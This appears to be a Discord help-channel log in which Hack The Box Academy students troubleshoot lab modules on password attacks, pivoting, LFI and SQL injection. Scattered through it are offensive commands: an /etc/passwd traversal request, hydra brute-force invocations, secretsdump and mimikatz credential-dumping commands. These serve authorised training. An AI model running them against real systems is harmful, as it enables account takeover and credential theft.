Dont tell us that u did something illegal if someone is not busy they will report u to law enforcement
hi I'm in Password Attacks module's pass the hash section. is there any way someone can help me with question 3? I am in David's user folder trying to get the hash. I looked in the hidden ssh subfolder and got a hash but it wasn't the right hash value.
just don't do it again without explicit permission
what have I done again
I'm trying to get David's password hash
if you want to learn more about Nmap, HTB Academy has a module for using the tool
I mean his account hash
ty boss
ty
can someone help me I used type command in cmd prompt and Get-Content in PowerShell to read the known_hosts file in david's folder it doesn't seem like I'm going in the right direction?
if someone could give a hint that would be good
I'm researching mimikatz and don't see a clear tutorial on how to get account hash for current user
Award to slowest module in all of cpts path goes to pivoting tunneling and port forwarding - RDP and socks tunneling with socks over RDP
Shit took me 2 hours and a half while i ALREADY knew exactly what to do, just to type the commands
Frustrating
Hello again. I'm on the Skills Assessment last question: "After cracking the NTLM password hashes contained in the NTDS.dit file, perform an analysis of the results and find out the MOST common password in the INLANEFREIGHT.LOCAL domain." I've been cracking all the hashes and got a list with all the passwords in a .pot file, and now I've been sorting the list and ran some sorting and at last uniq -c sorted_passwords.txt > counted_passwords.txt and got a list with the most used passwords, but what I've got is just used about one time or something. I've been trying the number one in my sorted list but it is not correct, and the others in the list are not correct either. Hm, what am I doing wrong on this last question? Please can someone help me out?! I'm going crazy
Was trying some grep too...
the module is "Cracking Passwords with Hashcat " btw
You want to focus on windows specific data, which is SAM or system memory where hashes are, now you can typically use mimikatz to interact with windows authentication mechanisms, as well as NTLM hashes, if you target hashes from other users you gotta extract them from SAM database directly, with system privileges of course, sekurlsa::logonpasswords relies on LSASS, which means it stores data in memory
Everyone always gives the GET /../../etc/passwd for Local File Inclusion yet I don't get how that's supposed to be any different from a Directory Traversal attack. Is LFI supposed to be a subset of the latter? Per ChatGPT, the difference is that mere Directory Traversal is read-only for the attacker whereas LFI leverages runtime code execution. Is this correct?
Lfi allows for code execution to a degree
And finding files you typically shouldn't
yes, with wrappers
Ah, i was thinking it was something like what you're saying, just use the NTLM hashes..
I'm not sure how to extract just the NTLM hashes, the module did not tell me anything about it. but ok, thanks, now i have something to go on!
And the name is dumb. "Local" in IT always means from your machine, if I'm manipulating the server then that's remote smh
"local" in this case means local [files] on the web server
there is remote file inclusion, which involves the web server being able to access files on other servers
Without sanitization someone could easily exploit LFI, but when application allows remote execution they can leverage the vulnerability to execute arbitrary code, which means it's much more dangerous then
It's a subset of directory traversal only in context when someone executes files
im trying to extract with secretsdump.py but on my own computer with EOS (EndeavourOS) i get this error, cuz i don't have the files needed: secretsdump.py -ntds DC01.inlanefreight.local.ntds LOCAL
Impacket v0.11.0 - Copyright 2023 Fortra
[-] Either the SYSTEM hive or bootkey is required for local parsing, check help
gah...
You need to manually gather SAM and SYSTEM hives or NTDS.dit, with bootkey from SYSTEM hive, it should encrypt hashes, make sure you reference them correctly
Dont you mean its a subset of dir traversal only in the context where the attacker doesn't execute files? Because it would be the code execution that would make it distinct supposedly.
Otherwise they're both just viewing files/traversing dirs
but... how to manually gather SAM and SYSTEM hives or NTDS.dit i have no target just the file ntds DC01.inlanefreight.local.ntds downloaded from the skill assessment.. This can't be the solution, the module did not cover anything about this at all ..
It becomes distinct from a simple directory traversal attack once you inject the code, depends how someone executes code, with a file or with something else
You can still extract them with impacket, but the tool will probably ask for some boot keys to decrypt NTLM hashes in ntds.dit, means that they are encrypted and can't be extracted without the boot key, unless you have access to the boot key you can't extract them directly
Thanx
I'm on the command injection skill assessment and found the injection point but can't find the flag I've run {ls,-la}, Obfuscated versions of ls with various quoting and even the find command such as find / -type f -name "flag.txt" in an Obfuscated format to bypass denied "malicious request"
that means there's a filter you need to figure out a way to bypass it
When a module asks me to enumerate the internal network I need to enumerate using that private ip right?
Pivoting tunneling and port forwarding - skills assessment - question 3
yeah, internal network is the private network, not public facing.
By searching modules channel, i found some link to writeup that contained the correct answer.
To save you time for searching, i will not give exact answer, just mention:
- file command is fully enough to obtain all you need;
- Correct answer consists of two parts, separated by space, it consists of around 11 chars, including space;
- The first part designates binary type; the other part - count of bits, including suffix '-bit';
Good luck to format everything you already know!
The question says to use mimikatz right?
Ok so I looked it up and the ip that was to be found was a public one. Idk why the question said to enumerate for a private ip
not the way you phrased the question
i'd need more details like module/section to know more, but purely based on your question that's wrong. internal network = private ip, not public.
inherently by definition a private network is not public
The question is:
Enumerate the internal network and discover another active host. Submit the ip as the answer
And the answer is a public ip 😑
module and section?
Pivot tunneling and port forwarding - skill assessment - question 3
there are only 2 ranges that start with 3 digits that are private, and 1 2 digit range. the overwhelming majority are public.
@cloud urchin U finished the room?
yes
it might be covered under the networking behind pivoting section
are you actually connected to the computer you need to find the ip on?
But everyone is crazy abt these things you cant share them in public etc
Yes I sshd into it with dynamic port forwarding and changed proxy chain file and rn I'm using nmap ping sweep for that ip address range that I found on the forum. I'm getting some weird stuff as result from nmap, it hasn't finished yet and it keeps starting over and over again
did you complete the Active Directory Enumeration and Attacks module yet?
Thx for help
nmap should work. there are a few ways to do it really..
So what I described is correct?
Like what I'm doing with ssh and port forwarding and nmap
idk i don't think i used that but i also dont know what command you did. nmap can find hosts if it works through port forwarding
Ok can I dm u
Btw if there's an admin here I would like to know what can be shared or not
if you're connected to the target ip the commands are in the "The Networking Behind Pivoting" like i mentioned
otherwise nmap, ping sweep
i believe metasploit can also do a ping sweep
The only commands in networking behind pivoting are ifconfig ipconfig and netstat -r
yeah if you're connected that should work. but idk if you're connected to the target in question etc
I'm not understanding
Why would ifconfig let me find the ip in the network
It's showing me the ip on the machine
right it shows the IP's on the machine you're on, that's why i said if you're connected to the machine it'll show you
Why would I care abt the ip im on, it's like the first thing you do after you land on the webshell
Like it's not getting me closer to answering the question
ok then use one of the other 3 techniques i mentioned lol
Aight np
If there's someone else who did this module pls tell me idk if I'm going in the right direction
Wtf why are they all up
@rustic sage I'm trying to find the ip to pivot to in the network. I used dynamic port forwarding , edited the proxy chain file with the right port, and did nmap ping sweep with proxychain to find a host that's up. It found 256 hosts up
And people on the forum are talking about CMD scripts and I have no idea why
pretty sure you can't get an ICMP reply through a forward like that
I think I got 256
They are all up
Maybe try to just SSH into that host and run a one-liner.
That's all the IPs bro.
The module goes over this, review the Meterpreter Tunneling and Port Forwarding section
Hey team - new to HTB. How do I prep for the CTFs? When I try to join a CTF it says I have to join a team. Do I just create a team of me?
This channel isn't for asking that
maybe ask in #1296444291291287633
Wdym one liner?
Yea
Ping sweep
I may be doing something wrong
Think for i .....
Yes you are
Yeah I tried it kept kicking me here.
you'll need to verify your account by following the instructions in #welcome
It's likely in the module. I'm not at my computer to check, but I'd say it's highly likely it's in the module.
At the beginning I was trying to upload nmap to the host but then I couldn't and did the port forwarding thing
You can do a ping sweep with bash
Don't make it overly complicated.
Oh shit
Like Ceald said.
I'll try in a min
Check hack tricks or just Google it
bro i told you that like 30 mins ago
Where
at 4:48pm pst
i said ping sweep, nmap, metasploit, or the ipconfig command
then later i gave you the section to review to see those commands

I'm trying to find the ip to pivot to in the network. I used dynamic port forwarding , edited the proxy chain file with the right port, and did nmap ping sweep with proxychain to find a host that's up. It found 256 hosts up @wary plover
Bash script isn't giving output
re-read the "Meterpreter Tunneling and Port Forwarding" section, it explains how to do all of this
Dude i just hopped on there and did not get 256 results back.
which module is this ?
Pivoting skill assessment
Idk I might be an idiot, bash script isn't giving results
how many times did you run it?
Send me a DM so I can ask a couple of questions.
everytime i spawn target, it goes to timeout, spawned target about 3 to 4 times
hmmm been a while since i done that assessment, booting it up right now
Try adding the parameter --smb-timeout 5
@rustic sage did you find the credentials on the webserver?
Multiples
Ok one moment
Yes and I sshd into the thing as webadmin
ok then there should be another host active in the 172. subnet
Using ssh port forwarding gives me 256 hosts and bash script is frozen
hmmm i used ligolo for the pivoting part :/, maybe the metasploit one could help as it says in the hint
Yes but I'm the question before that
this question right
Enumerate the internal network and discover another active host. Submit the IP address of that host as the answer.
did you review the section i mentioned?
Yes but it worked on the pwnbox
Yes it worked on the pwnbox
This place is not so shitty : )
Thx guys
yeah general can be quite hectic, better to go to here for questions regarding modules, happy hacking!
If all ports on the ip are filtered does it mean the pivoting to webadmin wasnt successful?
It doesn't give me error when using nmap against 172.x.x.x but all ports are filtered. Also rdp
Thanks! I figure it out.
Hi!
Has anyone encountered this issue when trying to upload an SVG file containing an XXE script in the Limited File Uploads module? Clicking on the upload button to upload the malicious SVG file does nothing. So far, I have tried the following:
-Using both Firefox and Google Chrome web browsers on Kali.
-Using a new Kali VM image and attempting to upload the SVG file.
I have no problem uploading the SVG file in both Tor Browser and Pwnbox, so I’m unsure what the issue could be.
Hello guys
Click the HTB logo
Hi, thanks for your help! I am able to upload any image file, but when the file contains an XXE payload, the upload button does not function upon clicking it. However, there is no issue with the Tor Browser; I was able to upload the XXE file and view its content.
i used burp so idk
my burp doesn't load when I try to send the xxe payload too. It just stuck at sending which is weird
Hi
Is there no daily refresh for pwnmachine the way there is on tryhackme?
Hello again... I'm going crazy.
Yesterday I finished all the questions in the Skill Assessment for Cracking hashes with hashcat except for the last question which reads:
After cracking the NTLM password hashes contained in the NTDS.dit file, perform an analysis of the results and find out the MOST common password in the INLANEFREIGHT.LOCAL domain.
I'll start with that
create a file with only hashes for NTLM and then crack them and then get a list that looks like this:
4f09bae1f5ededfff7fc8039304e4782:*****
then cut -d ':' -f 2 cracked_passwords.txt > passwords_only.txt to sort out the passwords only
and further sort passwords_only.txt | uniq -c | sort -no > password_frequencies.txt
to count the occurrence of passwords
finally head -n 1 password_frequencies.txt which finds the most common password.
So far so good, but the problem is that password is used only once in the whole file and the answer is wrong, I tried to make a slightly longer list of the most common password, but no password in the file is used more than once.
I have tried different techniques but I get the same password in response.
Have I got it wrong, is it which password is the most common overall ie most used worldwide and not just which password is the most common in the list of passwords from the cracked hashes or what am I doing wrong?
I'm having a stupid amount of frustration on the Using the Metasploit Framework Payloads module as I keep getting "exploited completed but no session created" I've set my LHOSTS to the VPN IP and I know I chose the correct payload. Any help would be appreciated because I've restarted my vpn several times, waited for the target ip to spawn several times to redo it, and it's beyond frustrating.
I've had big problems with reverse shell from my own machine via vpn to htb targets.. I went crazy myself, I used different types of reverse shell and nothing worked except at the end, then I used https://www.revshells.com/ but maybe it's not the reverse shell you're using? I noticed that even with a shell that worked, it didn't always work.. Try doing the exercise via pwnbox instead, because it seems to be difficult to do it via VPN..
I'll give that a shot, it's just been beyond frustrating man and I appreciate your help.
I know the feeling, im going crazy sometimes at HTB Academy.. Often the solution is not written about in the module or the correct method does not work at all..
It just worked and loaded me into a shell same everything I used on my VM, it must be a VPN issue. I've been having a lot of issues in general using my VM having to restart the VPN service a few times, but it's been happening more frequently here lately.
Like now, im on the last question for a skill assessment and im going crazy about it.. done all the things but it is wrong, and the module did not tell how to do everything so i was forced to find knowledge outside...
Ah.. Like i was believing..
I sat for many hours when I had the same problem.. In the end it worked but as I said not all the time, so it seems to be a problem with just such things via VPN
Maybe you or even I should report the problem to them, but they are probably aware of it, but it's good to pay more attention to them so they might prioritize
I know how you guys feel
I pwned several machines today but my brain is hurting so much
So many frustrations and struggles. It's good to take breaks and rest
What can disturb a lot is that in several cases the information you get in the module is insufficient to solve all the questions in the assessment, of course I understand that you might have to search for some information yourself etc. and not get a solution fed to you, but sometimes it feels like certain things are simply missing in a module..
Do they have a support that I can go through to submit the issue?
yes
Need some help? Learn how to reach the support team on Academy.
Exactly. I understand the try harder mentality and that's what hacking is all about, but it does seem like some things are genuinely broken at times and difficult to find information for a fix.
Awesome thanks man
Np
Yes, of course it's like that, that they want us to solve things ourselves and think outside the box, but as you say in some cases it's broken and it's not really that strange, but very disturbing.. The only thing we can do is to report
I finished all the questions in the Skill Assessment for Cracking hashes with hashcat except for the last question which reads:
After cracking the NTLM password hashes contained in the NTDS.dit file, perform an analysis of the results and find out the MOST common password in the INLANEFREIGHT.LOCAL domain.
I'll start with that
create a file with only hashes for NTLM and then crack them and then get a list that looks like this:
4f09bae1f5ededfff7fc8039304e4782:*****
then cut -d ':' -f 2 cracked_passwords.txt > passwords_only.txt to sort out the passwords only
and further sort passwords_only.txt | uniq -c | sort -no > password_frequencies.txt
to count the occurrence of passwords
finally head -n 1 password_frequencies.txt which finds the most common password.
So far so good, but the problem is that password is used only once in the whole file and the answer is wrong, I tried to make a slightly longer list of the most common password, but no password in the file is used more than once.
I have tried different techniques but I get the same password in response.
Have I got it wrong, is it which password is the most common overall ie most used worldwide and not just which password is the most common in the list of passwords from the cracked hashes or what am I doing wrong?
both the methods which they showed are not working.
Hello,
I am experiencing an issue with my HTB Academy account. My student subscription was unexpectedly closed, and I am unsure of the reason. Could someone please assist me in resolving this matter?
Contact support
Need to speak to a person? Learn how to reach our support via HTB Labs.
Wooov, i did it.. hehe, after about 10h and a lot of frustration... woop woop
is it a module just about Burp?
Attacking Wi-Fi Protected Setup (WPS) anyone finished that module?
I can't brute force PIN with reaver....
what tool u using?
https://academy.hackthebox.com/module/144/section/1255 can anybody help me with this module i know i probably need to set something up but idk what i added inlanefreight.htb to /etc/hosts whenever i try to do a zone transfer tho i just get nothing back
the module doesnt really go in depth ngl
Hey everyone, I’m stuck on the Password Attacks Lab - easy from the password attacks module.
I’ve tried crackmapexec and hydra ftp and ssh to target -u (user list given by resources) -p (password list given by resources) .
I’ve gone to the forum that says they find a password with the user Mike but this doesn’t work either.
I’ve also tried mutating the password file with the custom rule provided and created a mutated file from Inlanefreight, not getting any positive responses on any usernames or passes
‘Crackmapexec ftp 10.129.96.146 -u username.list -p password.list’
Crackmapexec ssh 10.129.96.146 -u username.list -p password.list
Hydra -L username.list -p password.list ftp://10.129.96.146 -vv
But no success
FTP - On the responses for crackmap I get a negative and (response ‘NoneType’ object has no attribute ‘sendall’)
SSH - I was getting the error bad authentication type; allowed types; publickey’ but then also get authentication failed
Give me 1 sec let me try
Thank you!!
please help with https://academy.hackthebox.com/module/144/section/1255#questionsDiv i keep getting connection timeout on both my machine and pwnbox idk what i have to setup to make it work but clearly im missing something
ah ok. attacking the FTP using hydra is the step in the right direction
yh you use hydra for it all
Ah right, I didn’t realise hydra would give different results to crackmap, is my syntax wrong on hydra, just checked, shouldn’t it be -P rather than -p 🤦🏼♂️😂
yes -P is to provide a list -p is to provide a password you already know
-L for username.txt, -P for password.txt
😩 that’ll be my mistake then, will give it a couple rounds on hydra, sorry for the silly mistake haha.
dont worry bout it
I really appreciate the help, trying to get through and pass CPTS before mid Jan but it’s slow going at times
are u using the pwnbox?
nvm lmao im blind.
tried both
whats ur dig command looking like
i tried a bunch the one im getting connection timeout with is 'dig axfr inlanefreight.htb @inlanefreight.htb' all the others i tried legit just do nothing
did u add the ip into ur /etc/hosts
oh my i was looking at my own notes and realised that they revamped the module 💀
exactly thats why im re doing it but shit just dont work
this isnt the only section i had this issue either
the whole module just doesnt work
@teal sparrow u might have to hang on for abit, i dont have access to a proper com/machine to redo this module on
whats ur hashcat mode?
22000
I did it a couple months ago, I’d connect to it but just on a long wait for brute forcing with hydra haha, not sure if this was the one where you had to point it to a different dns than just inlanefreight.htb might need to try a subdomain.
Like zone transfer from the base url and then try again from one of the subdomains found I think. Can’t remember, but will try asap
the section gives no details tbh its kinda annoying it just gives u one command
@dim ridge @idle marsh found the issue i had multiple VPN connections e.g. tun0 tun1 tun2 no idea how but i just killed them all and it worked
Nice!!
nvm I solved it tnx
oh bruh hahahaha
If you’re doing CPTS and they renew a module do you have to go back and complete it before the exam? 😬
Probably yeah you require 100% completion for the exam

its pretty weird actually. some of the modules which were reworked i had to redo, while some (like this DNS one) i was completely unaware it was changed.
this renew sucks because they changed all the questions as well but you cant input new answers to check if you're right
i remembered re-doing login brute force recently.
yup.
Hi.
I'm currently at the Password Attacks Module, in Network Services section.
In the exercise, it asks for 4 flags for 4 different users.
I got the WinRM, SSH, and SMB.
The thing is I've been waiting for almost more than 3 hours on RDP and it did not show up yet.
I tried both hydra and netexec, is there an issue with this task or something?
maybe use a custom list or some mask, or hybrid...
I thought of mutating the passwords but I did not yet reach password mutation section so I thought it's irrelevant in this case...
They explained nothing about it in this section either, so why should I try that? isn't the task supposed to be on what's being taught?
I've seen things not mentioned several times in the module that were the solution.. Seems like they want you to think outside the box and use all the different techniques that have been covered in all the modules.. But not sure if it is so just in your case, but it was a thought that slohg me might work
the RDP task is the 3rd one, isn't getting the 4th flag before the 3rd indicates some kind of problem?
will try that, thank you.
Np
Hello guys. I'm on day 3 of trying to connect up to this mysql database for this module. I cannot for the life of me figure out what I'm missing? I keep getting an error saying "Can't connect to local server through socket <file path>."
I've tried the following:
mysql <target ip> -u root -ppassword
mysql <target ip>-u root -p (followed by typing the password on the next prompt).
mysql <target ip> -u -P 3306 -p
Ive also tried maria db and a few other variations of the above. I've also tried using the ephemeral port provided as well after the -P
I'm not sure what the issue is. I can ping it and nmap it just fine.
I just felt dumb.....
It turns out netexec did try the credentials but failed, due to the target being shutdown automatically as I spent a lot of time in this task 🥲
done it, been there
The error suggests there’s an issue with the socket file path. By default, MySQL uses a socket file for local connections (on Unix-based systems). Sometimes the socket file is not located where the client expects it.
So how do I troubleshoot that? Just trying to locate it?
Am I just blind? I can't find the mac VM to do the MacOS fundamentals module
first you can make sure the port is correct with nc -zv <mysql-server-ip> 3306
If the connection is successful, it means MySQL is listening on that IP and port.
so i went to /run and there is no mysqld folder (its trying to use /run/mysqld/mysqld.sock).
And I'll do what you just said now.
I got the hash being used more than once.
You can DM what you have tried.
I did solve it, I forgot to use --username and then make a hashfile with the format: INLANEFREIGHT\Lynne.Thompson:31d6cfe0d16ae931b73c59d7e0c089c0
just a thought.. suspect you performed this locally on your own machine!? try doing the task via pwnbox instead, it can help sometimes, if you're not already doing it
I did... would it make a difference? Its a vm all the same right?
What I myself have noticed, and heard that others have had problems with, is that when you run via your own machine and connect via vpn, some things can go wrong, e.g. I and others have had a lot of problems with reverse shells when we run via vpn..
On brute forcing SMB I find I always get a false positive on users that don’t exist, is this common, how do we get around this
it is common when your command is not like it's supposed to be...
What is it supposed to be? Hydra -L username.list -P password.list smb://IPADDR
Command for Workgroup Environment (No Domain): If the SMB server doesn't use a domain, run:
hydra -L username.list -P password.list smb://IPADDR
Command for Domain Environment: If the SMB server uses a domain (e.g., INLANEFREIGHT), format your username.list with domain prefixes:
INLANEFREIGHT\username1
INLANEFREIGHT\username2
Then run:
hydra -L username.list -P password.list smb://IPADDR
Adding Verbosity: Use the -V flag to see each login attempt, which can help debug false positives:
hydra -L username.list -P password.list -V smb://IPADDR
Ah nice one thank you, well explained
im not 100% but it should work
and if you need dont forget to add posts to your hosts file
let me know if it was of any help
Was able to get what looks like the file with a guest auth
whats a good resource to practice sql injection queries
streamio from the main platform helped me alot
Maybe some HTB boxes or download boxes for vm from vulnhub
This is not the server for this buddy.
It still comes back with a false positive 
Hmmm.. i remember i was having some struggle with Medusa and false positives, i don't really remember but i like to think it was something with the syntax in hydra, hmm.. dam, cant remember, im so sorry, if my mind gets it back i tell you at the same moment
Ah, now i remember, for me the solution was use smb:\\ and not //
Smb:\\
Maybe it is the way to go for you too, i hope so.
If the smb is on a Windows machine it often uses \\ not //
Hi everyone,
I'm still at my beginning.
I'm on the module 'Attacking Web Applications with Ffuf' on the chapter: 'Sub-domain Fuzzing'
on the question part, it tells me: 'Try running a sub-domain fuzzing test on 'inlanefreight.com' to find a customer sub-domain portal. What is the full domain of it? '
I know how to fuzz on a subdomain but when I try it, I have no result. So I assume that there is no public DNS, I would like to solve it in /etc/hosts but the problem is that I have no IP to associate.
Where am I going wrong?
I've been on this for a while if someone could give me a clue
If i remember correctly it was not .com you should use, it was .htb, and put it all in your hosts file, can check my notes for it in a minute..
What wordlist are you using?
in my notes i was using: ffuf -w /home/julle/Dokument/HTB/WebApplications/Ffuf/subdomains-top1million-5000.txt:FUZZ -u https://FUZZ.inlanefreight.com/
i'm using this subdomains-top1million-5000.txt
by doing this I get nothing
I was using subdomain top1million 110000
try with [julle@HaxBox Ffuf]$ ffuf -w pathtolist/subdomains-top1million-5000.txt:FUZZ -u https://FUZZ.inlanefreight.com/ for me it worked
But i doubt it's that
Seems right
the question was: Try running a sub-domain fuzzing test on 'inlanefreight.com' to find a customer sub-domain portal. What is the full domain of it? I've got the text in my notes telling me the subdomain
I have already done the command you sent me but it does not return any subdomain.
I guess it is linked to a private DNS. Or am I doing something wrong?
If so, should I not add the IP and name association in my hosts file?
If so, where can I find the IP?
i did not write down exactly what i did, normally i note all steps, but did not this time... sorry
i can tell you what is in my notes without tell you the answer if you like..
hope my notes can help you on the way
If you need host just look up what ip inlanefreigth.com use
when you say: 'just look up the IP address used on inlanefreigth.com',
trying an nslookup on inlanefreigth.com I see that the IP is resolved but trying the ffuf again, I still get nothing
I have a question about the privesc module, I acknowledge that we are looking up privileges to exploit processes on service accounts, but wouldn't that require us gaining control to those service accounts to begin with?
Hello guys, I'm on linux fundamentals Filter contents page,
The question i have to answer is "How many services are listening on the target system on all interfaces? (Not on localhost and IPv4 only)"
Now, i have found a way to do this using the netstat command by filtering only the listening traffic, only tcp and udp and filtering out the localhost and ipv4
but, the response that i get with wc -l is 8, which is technically the truth since the response does contain 8 lines but 2 of the lines are "headers" so to say, so that would make the actual number of connections 6
but the correct answer is 7, is this a bug or am i missing something?
try ss -tuln | grep LISTEN | wc -l
not correct, even more connections appear
oh not on localhost
uhm
you can use a regex string with grep -e
grep -v -e '(0.0.0.0)' -e '(127.0.0.1)'
the thing is that netstat -tuln | grep -v "127.0.0.1" | grep -v "0.0.0.0" | grep -v "::1" works, but it outputs only 6 services
yes that is correct
but the correct answer is 7, which confuses me
hmm 🤷♂️
Hey im solving the documentation and reporting practice lab, i found hashes for 3 different users using responder and cracked them, now what to do, where to enter this password
By that point you should know what to do with some credentials. If you don't check your notes.
simplify, ||netstat -ln4 | grep -v '127' | grep -i 'listen' | wc -l||
Im just darn tired after a long day
I really wanna finish this module and get some sleep today
😅 thats why i asked
Win-PrivEsc SA 1. Found this after gaining admin shell(question 3). I guess this isnt the correct way, but what is it ?
oh, so the question asked me to provide non local host and non ipv6. tbh the question is a bit poorly worded
eating lasagne when you're nt
That worked with admin shell, not without
quick dm open to discuss what I did, don't want to spoiler anything
i can see that this command lists all of the services which have the LISTEN state, which in turn lists only the tcp connections, wouldnt it be technically correct to include udp connections as well even though they do not have the listen state?
UDP is stateless.
I am currently on the sql injection module, on database enumeration, I have managed to solve it by guessing that a field is called passwords but I cant seem to get something to work to list all of the columns in the database to see the corresponding users
This is the command I RAN
||cn' UNION SELECT 1, password, 3, 4 FROM users-- - ||
i am aware of that, so because of that udp can never have a state even though it is currently being used or waiting to be used? thanks for the answers btw
hi all, I'm currently working through the Intro to Windows Command Line and i keep getting this message when working within the VM
PS C:\Users\htb-student>> Import-Module ActiveDirectory
PS C:\Users\htb-student>> Get-ADUser -Filter {GivenName -like 'robert'}
Get-ADUser : The server has rejected the client credentials.
At line:1 char:1
- Get-ADUser -Filter {GivenName -like 'robert'}
-
+ CategoryInfo : SecurityError: (:) [Get-ADUser], AuthenticationException
+ FullyQualifiedErrorId : ActiveDirectoryCmdlet:System.Security.Authentication.AuthenticationException,Microsoft.ActiveDirectory.Management.Commands.GetADUser
I'm bouncing between the CMD Vs. PowerShell, All About Cmdlets and Modules and User and Group Management, modules
The problem is revealed in the error message right here... it's saying the server is rejecting your credentials.
are you authenticated against the domain with domain creds, or are you using a local account or something?
can anyone help me with the introduction to assembly skill assessment module
i am SSHed into the target, not sure if that answers your question using the credentials at the bottom of the module
which section
i've opened PowerShell within linux, i've also remoted into the windows desktop and opened powershell there though i believe it's essentially the same machine so i shouldn't expect a different result
Introduction to Windows Command Line
CMD Vs. PowerShell
and the next 1-2 sections, i've been struggling here a bit
side note: within Introduction to Windows Command Line Page 14 Working with Files and Directories, this threw me for a loop.
How do I get access to talk in general?
you don't even need to be connected to the box to answer the questions. they aren't asking you to run those commands, it's just telling you.
follow whats asked in the welcome channel
https://academy.hackthebox.com/module/35/section/227
can someone help me
Looks like your curl request is specifically asking for the 'flag' city, maybe pull all cities instead of the one you created
Ohhh thank you
But just curious I’m only on here to see if I could get help getting into old social medias I don’t have access to would I even get that here ?
nope. you'll need to reach out to the company.
well i was supposed to look for flag, i can see all the cities but in the question it was asked to look for flag rather than anything else
I gotta say this is some pretty cool stuff, you got the uhh
no, that's not what it says. it says to add the flag city, then delete a city, then pull the data. you're only pulling the data you input into it.
files and you take ownership of it given a permission
and then you gotta make changes to it with icacls
ohk thanks ill check
thanks that did it
lol it was taking me so long to get the flag
i was running them along side the modules just to get a little practice as i go, ok thank you!
yeah understandable
if i do find myself struggling to get through some of these fundamentals modules, should i just power through and dig deeper if i find myself stuck in one of the pen testers modules?
you can always ask here
i'm just struggling to understand how well i need to understand every single concept before diving into the pen testers course
a lot of them are follow along but some aren't
yeah hard to say that.. all depends on how much you already know, etc
the cpts course is a beginner-intermediate course for hacking, but hacking isn't a beginner part of IT
yea i think thats part of whats getting me stuck, i'm assuming i can follow along and when i'm in a module that doesn't really allow that, i think i'm at a total loss lol
understood, i guess the only way to find out is to start the course and go from there
Yes
is anyone else having issues with with the Xorsearch and scdebug.exe in "Malicious Document Analysis "?
This is about ethical white hat pentest hacking, not for kids who like to play hacker and get into social media accounts..
Hello, i am new to htb academy. i was just surfing from one exam path to another and checking out modules when suddenly a screen popped up saying that i broke one of the rules of the site and my ip is blocked for 15 minutes. can anybody help me understand what i did wrong so that it doesn’t happen again
Contact the support
It is hard for us to guess what you did wrong.
And, read the rules !
It is showing “it seems that you have triggered one of our rate-limiting rules
Note that crawling and/or scanning any part of the website is not allowed”
sounds like you just browsed too quickly through too many pages and they now think you are a bot crawling the website, just wait the 15 minutes and try not to open too many modules in quick succession
Ok.. did you do something like that? If you chat or start a ticket with support that may give you an answer, they should be able to see what happened. It is not a thing we can do to see it, if you don't get lucky and someone from HTB looks at your post here
Maybe..
Yes i did this I didn’t know i will be temporary blocked 🙂
🙂
Now i get why this is a hacking learning platform there are too many rules
It showed me without even starting my course
Before, you needed to hack your way into the registration :)
Hello guys... several days and hours later, whether I use pwnbox or my own vpn, I cannot connect to the mysql server target given to me in the module for the sql injection module... I keep getting either "Can't connect to server on 'localhost' (111)", or "Error 2002 (HY000): Can't connect to local server through socket '/run/mysqld/mysqld.sock' (2)"
I have no earthly idea what I'm doing wrong trying to connect up.
The fundamentals module, or what? A specific section link would be useful.. but I'd recommend reading back over the content, specifically where it describes the use of the command you're using.
iirc that module is mostly a website you visit and input commands there. have you tried navigating to the target in your browser?
@cloud urchin I haven't tried putting it in the browser... i'll try that.
@ocean night It's the SQL injection module, and the section is Intro to MySQL.
@sand rose - can I DM?
You don't put it in the browser, at least for the step they are on
..or I can guide here, as it's Tier 0
Guys quick question I started htb penetration test path a week ago and in the first module it says I need to have a strong foundation in 9 modules other than the 28, which are like 9. Do i really need to go through these or will I learn throughout the 28 modules ?
@ocean night Sure.
So I assume you're on this section? https://academy.hackthebox.com/module/33/section/183
Yes, it is
Depends on your previous experience. If you work in IT, are a sysadmin, etc, you probably don't need to go through the fundamentals. If you're starting with zero knowledge, going through the fundamental stuff is going to be crucial.
I was about to link it lol xP.
Ok, so you spawn a target right, and you get an IP and a port?
Yup
Ok, so have a read up, and see the explanations of how you use the mysql command
There are a few examples, one of which you will need to use certain arguments to complete this step
I worked in IT as a help desk, finished security+ and I started working soc 2 months ago but for example like the linux module is 6 hours and I know like 4 or 6 commands only so like is it worth it or will I learn throughout the 28 modules
You have a target, you are not being asked to connect to a server on your machine
I would say it would probably be worth it to go through the Linux stuff if you're not familiar with linux. The course will definitely show/teach you the commands, but you will be expected to know the basics already.
I have. I've been trying the following:
mysql <target> -u root -p
I then use password. I've also tried putting the password next to the -p (without a space), and I've also used -P 30914 (the ephemeral port given) and -P 3306 in the argument as well
What is the other argument being used in the examples?
You've got -P there for port, -p for password and -u for username
There's one more that you are missing
Do I need the docker one too?
Your target has an IP address and a port number
Read what it states above that section where it mentions docker
The target is not local
It keeps saying "unknown server host 'docker.hackthebox.eu'"
Right - but you have spawned a target
yes
That target has an IP address and port number
Ive been using those
The host doesn't need to be a domain name, it can be an IP address
That section with "docker.hackthebox.eu" is just an example - you need to adapt it to match the provided target
Let's head to DM's - we're being quite noisy here 😉
And IF the target is in a domain you have to add post in /etc/hosts..
True, but MySQL doesn't care about the domain name
Other services mind, yes they do (e.g. web servers)
Ah, now i see, just read the last post about the target and ip.. did not see it was sql
All good 👍
I am trying this tutorial on mimikatz:
https://joshdawes.com/dumping-ntlm-hashes-from-sam-using-mimikatz/
I am trying to do question 3 on the password attacks module's pass the hash section. I am logged into the Windows device as administrator. I am trying to dump the hashes but its not working
C:\Windows\System32\config>dir
Volume in drive C has no label.
Volume Serial Number is B8B3-0D72
Directory of C:\Windows\System32\config
10/25/2022 06:18 AM <DIR> .
10/25/2022 06:18 AM <DIR> ..
10/25/2022 07:26 AM 65,536 BBI
10/06/2021 03:36 PM 28,672 BCD-Template
10/16/2022 05:44 AM 56,885,248 COMPONENTS
10/25/2022 07:26 AM 524,288 DEFAULT
11/17/2024 05:13 PM 4,009,984 DRIVERS
10/06/2021 02:37 PM 32,768 ELAM
09/15/2018 01:19 AM <DIR> Journal
11/17/2024 05:10 PM 144 netlogon.ftl
09/15/2018 01:19 AM <DIR> RegBack
10/25/2022 07:26 AM 131,072 SAM
10/25/2022 07:26 AM 65,536 SECURITY
11/17/2024 05:10 PM 83,361,792 SOFTWARE
10/25/2022 07:26 AM 17,301,504 SYSTEM
09/15/2018 01:19 AM <DIR> systemprofile
02/25/2022 09:38 AM <DIR> TxR
11 File(s) 162,406,544 bytes
6 Dir(s) 17,981,874,176 bytes free
C:\Windows\System32\config>lsadump::sam /system:SYSTEM /sam:SAM
can someone help me out here?
are you running this from mimikatz? that doesn't look like the mimikatz shell
